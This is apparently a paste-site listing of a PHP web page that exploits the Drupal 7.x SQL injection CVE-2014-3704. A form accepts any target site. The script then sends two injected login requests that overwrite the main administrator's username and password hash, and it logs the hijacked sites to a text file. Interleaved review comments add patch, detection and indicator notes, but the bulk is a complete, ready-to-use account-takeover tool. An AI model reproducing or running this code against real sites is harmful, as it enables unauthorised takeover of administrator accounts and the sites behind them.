jackwilder

Drupal core 7.x Auto SQL Injection

Jun 11th, 2015
  1. <?php ?>  <!Doctype HTML>
  2. <html>
  3. <head>
  4.     <title>Drupal Exploit</title>
  5. <body>
  6. </head>
  7. <body>
  8.     <div class="mymargin">
  9.         <center>
  10.             <font color="red"><h1>Drupal Exploit</h1></font>
  11.              
  12.     <form method="GET" action="">
  13.         Site : <input type="text" name="url" placeholder="Example: www.site.com">
  14.         <input type="submit" name="submit" value="suck it !">
  15.     </form>
  16.     <br>
  17. <?php
  18. #-----------------------------------------------------------------------------#
  19. # Exploit Title: Drupal core 7.x - SQL Injection                              #
  20. # Date: Oct 16 2014                                                           #
  21. # Exploit Author: Dustin Dörr                                                 #
  22. # Software Link: http://www.drupal.com/                                       #
  23. # Version: Drupal core 7.x versions prior to 7.32                             #
  24. # CVE: CVE-2014-3704                                                          #
  25. #-----------------------------------------------------------------------------#
      # NOTE(review): defensive context. Per the header, the flaw is fixed in
      # Drupal 7.32, so upgrading is the remediation. Upgrading does not revert a
      # users row that was already rewritten; a site that was reachable while
      # unpatched needs its uid 1 account and other admin accounts reviewed.
      #
      # Opens rock-you.txt in append mode in the script's working directory.
      # $file is not read, written or closed anywhere in this listing; the
      # branches further down open their own handle to the same file.
  26. $file = fopen("rock-you.txt", "a");
      # Turns off all PHP error reporting, so a failed fopen() or a failed HTTP
      # fetch later in the script produces no diagnostic output.
  27. error_reporting(0);
  28. if (isset($_GET['submit'])) {
          # Runs when the form is submitted (a `submit` query parameter is present).
          # $_GET['url'] is concatenated as-is: no host validation here, and no
          # HTML escaping where $url is echoed in the success message below.
  29.     $url = "http://" . $_GET['url'];
          # Login-form body for form_id=user_login. The `name` field is sent as an
          # array whose first key carries a second SQL statement; that statement
          # sets name, pass (a fixed password hash) and status on the users row
          # with uid 1.
          # NOTE(review): detection. In request logs or WAF rules, the signature
          # is a POST to a Drupal login form where `name` arrives as an array and
          # a key contains `;` or SQL keywords. After the fact, the indicator
          # visible in this listing is the uid 1 account name being changed to the
          # literal value set below.
  30.     $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
          # Stream-context options for a form-encoded POST; the header string
          # contains a literal line break after the Content-Type value.
  31.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  32. ", 'content' => $post_data));
  33.     $ctx = stream_context_create($params);
          # Sends the POST to <url>/user/login/ and keeps the response body.
          # With error reporting off, a failed fetch leaves $data === false silently.
  34.     $data = file_get_contents($url . '/user/login/', null, $ctx);
          # The closing escaped quote is emitted after </h4> (cosmetic markup slip).
  35.     echo "<h4>Scanning at \"/user/login/</h4>\"";
          # Success is inferred only from the response text: either a PHP warning
          # about mb_strlen() or the string 'FcUk Crap' appearing in the page.
          # NOTE(review): this is a heuristic on displayed output and does not
          # confirm that the row was changed; a site that hides PHP warnings may
          # not match, so a non-match is not evidence that a site was unaffected.
  36.     if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
              # Appends the result to rock-you.txt, which the page then links to.
              # NOTE(review): on a host where this script is found, rock-you.txt and
              # its "Donnazmi" separator line are artefacts listing the URLs that
              # matched. The plaintext password named in the message is the
              # script's own claim; only the hash is visible in this listing.
  37.         $fp = fopen("rock-you.txt", 'a');
  38.         echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
  39.         echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
  40.         fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
  41.         fwrite($fp, "
  42. ");
  43.         fwrite($fp, "======================================Donnazmi==============================================================");
  44.         fwrite($fp, "
  45. ");
  46.         fclose($fp);
  47.     } else {
              # Covers every non-match: fetch failure, patched site, or a site that
              # does not print the strings checked above.
  48.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  49.     }
  50. }
  51. if (isset($_GET['submit'])) {
          # Second pass, triggered by the same `submit` parameter, so one form
          # submission results in a second outbound POST from this block.
          # $_GET['url'] is again used unvalidated, and $url is echoed unescaped in
          # the success message. Here $url already ends in "/".
  52.     $url = "http://" . $_GET['url'] . "/";
          # Same array-key technique against the login block form
          # (form_id=user_login_block): the first key of `name` carries a second
          # SQL statement that sets name, pass hash and status on the uid 1 row.
          # NOTE(review): detection. Look for POSTs to the front page with
          # form_id=user_login_block where `name` is an array and a key contains
          # `;` or SQL keywords.
  53.     $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
          # Stream-context options for a form-encoded POST; the header string
          # contains a literal line break after the Content-Type value.
  54.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  55. ", 'content' => $post_data));
  56.     $ctx = stream_context_create($params);
          # Sends the POST to <url>/?q=node&destination=node and keeps the response.
  57.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
          # The closing escaped quote is emitted after </h4> (cosmetic markup slip).
  58.     echo "<h4>Scanning at \"Index</h4>\"";
          # Only the mb_strlen() warning text is checked here.
          # NOTE(review): the match depends on the target printing PHP warnings in
          # the page and does not verify the database change, so a non-match does
          # not show that a site was unaffected.
  59.     if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
              # Appends the result to rock-you.txt and links to it from the page.
              # Because $url ends in "/", the reported address contains "//user/login".
              # NOTE(review): rock-you.txt with the "Donnazmi" separator is an
              # artefact to look for on a host where this script is found. The
              # plaintext password in the message is the script's own claim.
  60.         $fp = fopen("rock-you.txt", 'a');
  61.         echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
  62.         echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
  63.         fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
  64.         fwrite($fp, "
  65. ");
  66.         fwrite($fp, "======================================Donnazmi==============================================================");
  67.         fwrite($fp, "
  68. ");
  69.         fclose($fp);
  70.     } else {
              # Covers every non-match: fetch failure, patched site, or a site that
              # does not print the warning text checked above.
  71.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  72.     }
  73. }
  74. ?>
  75. <br>
  76.     </div>
  77.  
  78. </body>
  79. </html>